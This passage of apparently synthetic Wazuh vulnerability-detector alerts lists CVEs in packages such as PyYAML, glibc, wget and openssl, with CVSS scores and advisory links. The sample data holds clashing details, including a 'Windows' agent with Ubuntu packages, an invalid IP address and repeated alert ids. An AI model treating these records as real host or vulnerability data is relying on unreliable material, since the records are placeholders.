constructor.","severity":"High","published":"2020-03-24","updated":"2020-05-11","state":"Fixed","cwe_reference":"CWE-20","references":["http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00017.html","http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00017.html","https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1747","https://github.com/yaml/pyyaml/pull/386","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K5HEPD7LEVDPCITY5IMDYWXUMX37VFMY/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WORRFHPQVAFKKXXWLSSW6XKUYLWM6CSH/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZBJA3SGNJKCAYPSHOHWY3KBCWNM5NYK2/","https://nvd.nist.gov/vuln/detail/CVE-2020-1747"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"CVE-2016-7948 affects libxrandr2","id":"23506","firedtimes":84,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"005","name":"Centos","ip":"197.17.1.4"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libxrandr2","source":"libxrandr","version":"2:1.5.0-1","architecture":"amd64","condition":"Package less or equal than 1.5.0"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"7.500000"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"9.800000"}},"cve":"CVE-2016-7948","title":"CVE-2016-7948 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"X.org libXrandr before 1.5.1 allows remote X servers to trigger out-of-bounds write operations by leveraging mishandling of reply data.","severity":"Critical","published":"2016-12-13","updated":"2017-07-01","state":"Fixed","cwe_reference":"CWE-787","references":["http://www.openwall.com/lists/oss-security/2016/10/04/2","http://www.openwall.com/lists/oss-security/2016/10/04/4","http://www.securityfocus.com/bid/93373","http://www.securitytracker.com/id/1036945","https://cgit.freedesktop.org/xorg/lib/libXrandr/commit/?id=a0df3e1c7728205e5c7650b2e6dce684139254a6","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/74FFOHWYIKQZTJLRJWDMJ4W3WYBELUUG/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Y7662OZWCSTLRPKS6R3E4Y4M26BSVAAM/","https://lists.x.org/archives/xorg-announce/2016-October/002720.html","https://security.gentoo.org/glsa/201704-03","https://nvd.nist.gov/vuln/detail/CVE-2016-7948","http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-7948.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7948"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2015-5191 affects open-vm-tools","id":"23504","firedtimes":396,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"open-vm-tools","version":"2:10.2.0-3~ubuntu0.16.04.1","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"high","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"3.700000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"high","privileges_required":"low","user_interaction":"required","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"6.700000"}},"cve":"CVE-2015-5191","title":"CVE-2015-5191 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"VMware Tools prior to 10.0.9 contains multiple file system races in libDeployPkg, related to the use of hard-coded paths under /tmp. Successful exploitation of this issue may result in a local privilege escalation. CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H","severity":"Medium","published":"2017-07-28","updated":"2017-08-08","state":"Unfixed","cwe_reference":"CWE-362","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=869633"],"references":["http://www.securityfocus.com/bid/100011","http://www.securitytracker.com/id/1039013","https://www.vmware.com/security/advisories/VMSA-2017-0013.html","https://nvd.nist.gov/vuln/detail/CVE-2015-5191","http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-5191.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5191"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2019-17595 affects ncurses-base","id":"23504","firedtimes":222,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"ncurses-base","source":"ncurses","version":"6.1-1ubuntu1.18.04","architecture":"all","condition":"Package less than 6.1.20191012"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"partial","integrity_impact":"none","availability":"partial"},"base_score":"5.800000"}},"cve":"CVE-2019-17595","title":"CVE-2019-17595 on Ubuntu 18.04 LTS (bionic) - negligible.","rationale":"There is a heap-based buffer over-read in the fmt_entry function in tinfo/comp_hash.c in the terminfo library in ncurses before 6.1-20191012.","severity":"Medium","published":"2019-10-14","updated":"2019-12-23","state":"Fixed","cwe_reference":"CWE-125","bugzilla_references":["https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=942401"],"references":["http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00059.html","http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00061.html","https://lists.gnu.org/archive/html/bug-ncurses/2019-10/msg00013.html","https://lists.gnu.org/archive/html/bug-ncurses/2019-10/msg00045.html","https://nvd.nist.gov/vuln/detail/CVE-2019-17595","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-17595.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17595"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2017-18018 affects coreutils","id":"23504","firedtimes":1,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"003","name":"ip-10-0-0-180.us-west-1.compute.internal","ip":"10.0.0.180"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"coreutils","version":"8.28-1ubuntu1","architecture":"amd64","condition":"Package less or equal than 8.29"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"medium","authentication":"none","confidentiality_impact":"none","integrity_impact":"partial","availability":"none"},"base_score":"1.900000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"high","privileges_required":"low","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"high","availability":"none"},"base_score":"4.700000"}},"cve":"CVE-2017-18018","title":"CVE-2017-18018 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"In GNU Coreutils through 8.29, chown-core.c in chown and chgrp does not prevent replacement of a plain file with a symlink during use of the POSIX \"-R -L\" options, which allows local users to modify the ownership of arbitrary files by leveraging a race condition.","severity":"Medium","published":"2018-01-04","updated":"2018-01-19","state":"Fixed","cwe_reference":"CWE-362","references":["http://lists.gnu.org/archive/html/coreutils/2017-12/msg00045.html","https://nvd.nist.gov/vuln/detail/CVE-2017-18018","http://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-18018.html","http://www.openwall.com/lists/oss-security/2018/01/04/3","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18018","https://lists.gnu.org/archive/html/coreutils/2017-12/msg00072.html","https://lists.gnu.org/archive/html/coreutils/2017-12/msg00073.html"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2020-1927 affects apache2-bin","id":"23504","firedtimes":191,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"006","name":"Windows","ip":"207.45.34.78"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"apache2-bin","source":"apache2","version":"2.4.29-1ubuntu4.13","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"none"},"base_score":"5.800000"}},"cve":"CVE-2020-1927","title":"CVE-2020-1927 on Ubuntu 18.04 LTS (bionic) - low.","rationale":"In Apache HTTP Server 2.4.0 to 2.4.41, redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an an unexpected URL within the request URL.","severity":"Medium","published":"2020-04-02","updated":"2020-04-03","state":"Unfixed","cwe_reference":"CWE-601","references":["http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00002.html","http://www.openwall.com/lists/oss-security/2020/04/03/1","http://www.openwall.com/lists/oss-security/2020/04/04/1","https://httpd.apache.org/security/vulnerabilities_24.html","https://lists.apache.org/thread.html/r10b853ea87dd150b0e76fda3f8254dfdb23dd05fa55596405b58478e@%3Ccvs.httpd.apache.org%3E","https://lists.apache.org/thread.html/r1719675306dfbeaceff3dc63ccad3de2d5615919ca3c13276948b9ac@%3Cdev.httpd.apache.org%3E","https://lists.apache.org/thread.html/r52a52fd60a258f5999a8fa5424b30d9fd795885f9ff4828d889cd201@%3Cdev.httpd.apache.org%3E","https://lists.apache.org/thread.html/r70ba652b79ba224b2cbc0a183078b3a49df783b419903e3dcf4d78c7@%3Ccvs.httpd.apache.org%3E","https://security.netapp.com/advisory/ntap-20200413-0002/","https://nvd.nist.gov/vuln/detail/CVE-2020-1927","http://people.canonical.com/~ubuntu-security/cve/2020/CVE-2020-1927.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1927","https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-1927"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2020-1747 affects python3-yaml","id":"23505","firedtimes":44,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"python3-yaml","source":"pyyaml","version":"3.12-1build2","architecture":"amd64","condition":"Package less than 5.3.1"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"complete","integrity_impact":"complete","availability":"complete"},"base_score":"10"}},"cve":"CVE-2020-1747","title":"A vulnerability was discovered in the PyYAML library in versions before 5.3.1, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. An attacker could use this flaw to execute arbitrary code on the system by abusing the python/object/new constructor.","severity":"High","published":"2020-03-24","updated":"2020-05-11","state":"Fixed","cwe_reference":"CWE-20","references":["http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00017.html","http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00017.html","https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1747","https://github.com/yaml/pyyaml/pull/386","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K5HEPD7LEVDPCITY5IMDYWXUMX37VFMY/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WORRFHPQVAFKKXXWLSSW6XKUYLWM6CSH/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZBJA3SGNJKCAYPSHOHWY3KBCWNM5NYK2/","https://nvd.nist.gov/vuln/detail/CVE-2020-1747"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2019-17540 affects imagemagick","id":"23504","firedtimes":2,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"002","name":"Amazon","ip":"145.80.240.15"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"imagemagick","version":"8:6.9.7.4+dfsg-16ubuntu6.8","architecture":"amd64","condition":"Package less than 7.0.8-54"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"6.800000"}},"cve":"CVE-2019-17540","title":"ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.","severity":"Medium","published":"2019-10-14","updated":"2019-10-23","state":"Fixed","cwe_reference":"CWE-120","references":["https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15826","https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=942578","https://github.com/ImageMagick/ImageMagick/compare/7.0.8-53...7.0.8-54","https://github.com/ImageMagick/ImageMagick/compare/master@%7B2019-07-15%7D...master@%7B2019-07-17%7D","https://security-tracker.debian.org/tracker/CVE-2019-17540","https://nvd.nist.gov/vuln/detail/CVE-2019-17540"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"CVE-2019-9169 affects libc6","id":"23506","firedtimes":68,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"libc6","source":"glibc","version":"2.23-0ubuntu11","architecture":"amd64","condition":"Package less or equal than 2.29"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"7.500000"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"9.800000"}},"cve":"CVE-2019-9169","title":"CVE-2019-9169 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"In the GNU C Library (aka glibc or libc6) through 2.29, proceed_next_node in posix/regexec.c has a heap-based buffer over-read via an attempted case-insensitive regular-expression match.","severity":"Critical","published":"2019-02-26","updated":"2019-04-16","state":"Fixed","cwe_reference":"CWE-125","bugzilla_references":["https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34140","https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34142","https://sourceware.org/bugzilla/show_bug.cgi?id=24114"],"references":["http://www.securityfocus.com/bid/107160","https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34140","https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34142","https://kc.mcafee.com/corporate/index?page=content&id=SB10278","https://security.netapp.com/advisory/ntap-20190315-0002/","https://sourceware.org/bugzilla/show_bug.cgi?id=24114","https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=583dd860d5b833037175247230a328f0050dbfe9","https://support.f5.com/csp/article/K54823184","https://nvd.nist.gov/vuln/detail/CVE-2019-9169","http://people.canonical.com/~ubuntu-security/cve/2019/CVE-2019-9169.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9169"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2018-20483 affects wget","id":"23505","firedtimes":175,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"wget","version":"1.17.1-1ubuntu1.5","architecture":"amd64","condition":"Package less than 1.20.1"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"none","availability":"none"},"base_score":"2.100000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"low","privileges_required":"low","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"7.800000"}},"cve":"CVE-2018-20483","title":"set_file_metadata in xattr.c in GNU Wget before 1.20.1 stores a file's origin URL in the user.xdg.origin.url metadata attribute of the extended attributes of the downloaded file, which allows local users to obtain sensitive information (e.g., credentials contained in the URL) by reading this attribute, as demonstrated by getfattr. This also applies to Referer information in the user.xdg.referrer.url metadata attribute. According to 2016-07-22 in the Wget ChangeLog, user.xdg.origin.url was partially based on the behavior of fwrite_xattr in tool_xattr.c in curl.","severity":"High","published":"2018-12-26","updated":"2019-04-09","state":"Fixed","cwe_reference":"CWE-255","references":["http://git.savannah.gnu.org/cgit/wget.git/tree/NEWS","http://www.securityfocus.com/bid/106358","https://access.redhat.com/errata/RHSA-2019:3701","https://security.gentoo.org/glsa/201903-08","https://security.netapp.com/advisory/ntap-20190321-0002/","https://twitter.com/marcan42/status/1077676739877232640","https://usn.ubuntu.com/3943-1/","https://nvd.nist.gov/vuln/detail/CVE-2018-20483"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":13,"description":"CVE-2017-12588 affects rsyslog","id":"23506","firedtimes":64,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"rsyslog","version":"8.16.0-1ubuntu3.1","architecture":"amd64","condition":"Package less or equal than 8.27.0"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"low","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"7.500000"},"cvss3":{"vector":{"attack_vector":"network","access_complexity":"low","privileges_required":"none","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"9.800000"}},"cve":"CVE-2017-12588","title":"The zmq3 input and output modules in rsyslog before 8.28.0 interpreted description fields as format strings, possibly allowing a format string attack with unspecified impact.","severity":"Critical","published":"2017-08-06","updated":"2017-08-14","state":"Fixed","cwe_reference":"CWE-134","references":["https://github.com/rsyslog/rsyslog/blob/master/ChangeLog","https://github.com/rsyslog/rsyslog/commit/062d0c671a29f7c6f7dff4a2f1f35df375bbb30b","https://github.com/rsyslog/rsyslog/pull/1565","https://nvd.nist.gov/vuln/detail/CVE-2017-12588"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":5,"description":"CVE-2019-1552 affects openssl","id":"23503","firedtimes":11,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"openssl","version":"1.1.1-1ubuntu2.1~18.04.6","architecture":"amd64","condition":"Package greater or equal than 1.1.1 and less or equal than 1.1.1c"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"medium","authentication":"none","confidentiality_impact":"none","integrity_impact":"partial","availability":"none"},"base_score":"1.900000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"low","privileges_required":"low","user_interaction":"none","scope":"unchanged","confidentiality_impact":"none","integrity_impact":"low","availability":"none"},"base_score":"3.300000"}},"cve":"CVE-2019-1552","title":"OpenSSL has internal defaults for a directory tree where it can find a configuration file as well as certificates used for verification in TLS. This directory is most commonly referred to as OPENSSLDIR, and is configurable with the --prefix / --openssldir configuration options. For OpenSSL versions 1.1.0 and 1.1.1, the mingw configuration targets assume that resulting programs and libraries are installed in a Unix-like environment and the default prefix for program installation as well as for OPENSSLDIR should be '/usr/local'. However, mingw programs are Windows programs, and as such, find themselves looking at sub-directories of 'C:/usr/local', which may be world writable, which enables untrusted users to modify OpenSSL's default configuration, insert CA certificates, modify (or even replace) existing engine modules, etc. For OpenSSL 1.0.2, '/usr/local/ssl' is used as default for OPENSSLDIR on all Unix and Windows targets, including Visual C builds. However, some build instructions for the diverse Windows targets on 1.0.2 encourage you to specify your own --prefix. OpenSSL versions 1.1.1, 1.1.0 and 1.0.2 are affected by this issue. Due to the limited scope of affected deployments this has been assessed as low severity and therefore we are not creating new releases at this time. Fixed in OpenSSL 1.1.1d (Affected 1.1.1-1.1.1c). Fixed in OpenSSL 1.1.0l (Affected 1.1.0-1.1.0k). Fixed in OpenSSL 1.0.2t (Affected 1.0.2-1.0.2s).","severity":"Low","published":"2019-07-30","updated":"2019-08-23","state":"Fixed","cwe_reference":"CWE-295","references":["https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=54aa9d51b09d67e90db443f682cface795f5af9e","https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b15a19c148384e73338aa7c5b12652138e35ed28","https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=d333ebaf9c77332754a9d5e111e2f53e1de54fdd","https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e32bc855a81a2d48d215c506bdeb4f598045f7e9","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EWC42UXL5GHTU5G77VKBF6JYUUNGSHOM/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Y3IVFGSERAZLNJCK35TEM2R4726XIH3Z/","https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZBEV5QGDRFUZDMNECFXUSN5FMYOZDE4V/","https://security.netapp.com/advisory/ntap-20190823-0006/","https://support.f5.com/csp/article/K94041354","https://support.f5.com/csp/article/K94041354?utm_source=f5support&utm_medium=RSS","https://www.openssl.org/news/secadv/20190730.txt","https://www.oracle.com/security-alerts/cpuapr2020.html","https://www.oracle.com/security-alerts/cpujan2020.html","https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html","https://www.tenable.com/security/tns-2019-08","https://www.tenable.com/security/tns-2019-09","https://nvd.nist.gov/vuln/detail/CVE-2019-1552"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2018-8769 affects elfutils","id":"23505","firedtimes":45,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"007","name":"Debian","ip":"24.273.97.14"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"elfutils","version":"0.170-0.4ubuntu0.1","architecture":"amd64","condition":"Package matches a vulnerable version"},"cvss":{"cvss2":{"vector":{"attack_vector":"network","access_complexity":"medium","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"6.800000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"low","privileges_required":"none","user_interaction":"required","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"7.800000"}},"cve":"CVE-2018-8769","title":"elfutils 0.170 has a buffer over-read in the ebl_dynamic_tag_name function of libebl/ebldynamictagname.c because SYMTAB_SHNDX is unsupported.","severity":"High","published":"2018-03-18","updated":"2019-10-03","state":"Pending confirmation","cwe_reference":"CWE-125","references":["https://sourceware.org/bugzilla/show_bug.cgi?id=22976","https://nvd.nist.gov/vuln/detail/CVE-2018-8769"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":10,"description":"CVE-2018-7738 affects uuid-runtime","id":"23505","firedtimes":130,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"004","name":"Ubuntu","ip":"47.204.15.21"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"uuid-runtime","source":"util-linux","version":"2.27.1-6ubuntu3.10","architecture":"amd64","condition":"Package less or equal than 2.31"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"low","authentication":"none","confidentiality_impact":"complete","integrity_impact":"complete","availability":"complete"},"base_score":"7.200000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"low","privileges_required":"low","user_interaction":"none","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"7.800000"}},"cve":"CVE-2018-7738","title":"CVE-2018-7738 on Ubuntu 16.04 LTS (xenial) - negligible.","rationale":"In util-linux before 2.32-rc1, bash-completion/umount allows local users to gain privileges by embedding shell commands in a mountpoint name, which is mishandled during a umount command (within Bash) by a different user, as demonstrated by logging in as root and entering umount followed by a tab character for autocompletion.","severity":"High","published":"2018-03-07","updated":"2019-10-03","state":"Fixed","cwe_reference":"NVD-CWE-noinfo","bugzilla_references":["http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=892179","https://github.com/karelzak/util-linux/issues/539"],"references":["http://www.securityfocus.com/bid/103367","https://bugs.debian.org/892179","https://github.com/karelzak/util-linux/commit/75f03badd7ed9f1dd951863d75e756883d3acc55","https://github.com/karelzak/util-linux/issues/539","https://www.debian.org/security/2018/dsa-4134","https://nvd.nist.gov/vuln/detail/CVE-2018-7738","http://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-7738.html","https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7738"],"assigner":"cve@mitre.org","cve_version":"4.0"}},"location":"vulnerability-detector"} +{"timestamp":"{timestamp}","rule":{"level":7,"description":"CVE-2015-5191 affects open-vm-tools","id":"23504","firedtimes":396,"mail":false,"groups":["vulnerability-detector"],"gdpr":["IV_35.7.d"],"pci_dss":["11.2.1","11.2.3"],"tsc":["CC7.1","CC7.2"]},"agent":{"id":"001","name":"RHEL7","ip":"187.54.247.68"},"manager":{"name":"wazuh-manager"},"cluster":{"name":"wazuh-cluster","node":"wazuh-manager"},"id":"1580123327.49031","predecoder":{},"decoder":{"name":"json"},"data":{"vulnerability":{"package":{"name":"open-vm-tools","version":"2:10.2.0-3~ubuntu0.16.04.1","architecture":"amd64","condition":"Package unfixed"},"cvss":{"cvss2":{"vector":{"attack_vector":"local","access_complexity":"high","authentication":"none","confidentiality_impact":"partial","integrity_impact":"partial","availability":"partial"},"base_score":"3.700000"},"cvss3":{"vector":{"attack_vector":"local","access_complexity":"high","privileges_required":"low","user_interaction":"required","scope":"unchanged","confidentiality_impact":"high","integrity_impact":"high","availability":"high"},"base_score":"6.700000"}},"cve":"CVE-2015-5191","title":"CVE-2015-5191 on Ubuntu 16.04 LTS (xenial) - low.","rationale":"VMware Tools prior to 10.0.9 contains multiple 